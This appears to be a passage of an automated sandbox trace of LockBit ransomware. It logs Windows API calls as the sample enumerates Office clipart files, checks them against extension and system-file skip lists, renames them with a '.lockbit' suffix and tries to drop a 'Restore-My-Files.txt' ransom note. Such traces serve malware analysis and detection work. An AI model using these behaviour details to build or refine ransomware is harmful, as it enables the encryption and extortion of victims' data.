(lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.608] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.608] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.608] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.608] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00629_.WMF.lockbit") returned 72 [0175.608] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00629_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.609] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.609] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.609] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4070) returned 1 [0175.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.610] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.620] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00629_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00629_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.620] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.620] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.621] free (_Block=0x1fa2ed8) [0175.621] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00629_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.621] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.621] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.622] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x752a9b00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x752a9b00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x5006, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00633_.WMF", cAlternateFileName="")) returned 1 [0175.622] lstrcmpiW (lpString1=".", lpString2="SO00633_.WMF") returned -1 [0175.622] lstrcmpiW (lpString1="..", lpString2="SO00633_.WMF") returned -1 [0175.622] PathFindExtensionW (pszPath="SO00633_.WMF") returned=".WMF" [0175.622] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.622] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.623] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.623] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00633_.WMF") returned -1 [0175.625] lstrcmpiW (lpString1="ntldr", lpString2="SO00633_.WMF") returned -1 [0175.625] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00633_.WMF") returned -1 [0175.625] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00633_.WMF") returned -1 [0175.625] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00633_.WMF") returned -1 [0175.625] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00633_.WMF") returned 1 [0175.625] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00633_.WMF") returned -1 [0175.625] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.625] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00633_.WMF") returned=".WMF" [0175.625] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.625] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.625] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.626] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.626] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00633_.WMF.lockbit") returned 72 [0175.626] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00633_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00633_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.627] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.627] malloc (_Size=0x40068) returned 0x3df0008 [0175.627] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20486) returned 1 [0175.628] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.628] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.628] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.628] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.629] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.643] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00633_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00633_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.645] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.645] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0175.645] free (_Block=0x1fa2ed8) [0175.645] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00633_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.645] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.645] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.645] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3039c00, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3039c00, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0x1aba, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00638_.WMF", cAlternateFileName="")) returned 1 [0175.645] lstrcmpiW (lpString1=".", lpString2="SO00638_.WMF") returned -1 [0175.645] lstrcmpiW (lpString1="..", lpString2="SO00638_.WMF") returned -1 [0175.645] PathFindExtensionW (pszPath="SO00638_.WMF") returned=".WMF" [0175.645] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.645] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.645] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.645] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.645] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.645] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.645] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.646] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.646] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00638_.WMF") returned -1 [0175.647] lstrcmpiW (lpString1="ntldr", lpString2="SO00638_.WMF") returned -1 [0175.647] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00638_.WMF") returned -1 [0175.647] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00638_.WMF") returned -1 [0175.647] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00638_.WMF") returned -1 [0175.647] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00638_.WMF") returned 1 [0175.647] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00638_.WMF") returned -1 [0175.647] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.647] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00638_.WMF") returned=".WMF" [0175.647] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.647] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.647] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.648] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.648] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00638_.WMF.lockbit") returned 72 [0175.648] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00638_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.651] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.651] malloc (_Size=0x40068) returned 0x3df0008 [0175.651] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6842) returned 1 [0175.651] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.651] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.651] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.652] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.652] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.654] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00638_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00638_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.654] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.654] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.655] free (_Block=0x1fa2ed8) [0175.655] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00638_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.655] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.655] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.655] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53153500, ftCreationTime.dwHighDateTime=0x1bd4b44, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x53153500, ftLastWriteTime.dwHighDateTime=0x1bd4b44, nFileSizeHigh=0x0, nFileSizeLow=0x584, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00656_.WMF", cAlternateFileName="")) returned 1 [0175.655] lstrcmpiW (lpString1=".", lpString2="SO00656_.WMF") returned -1 [0175.655] lstrcmpiW (lpString1="..", lpString2="SO00656_.WMF") returned -1 [0175.655] PathFindExtensionW (pszPath="SO00656_.WMF") returned=".WMF" [0175.655] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.655] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.655] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.655] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.655] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.655] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.655] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.656] lstrcmpiW (lpString1=".bat", lpString2=".WMF") 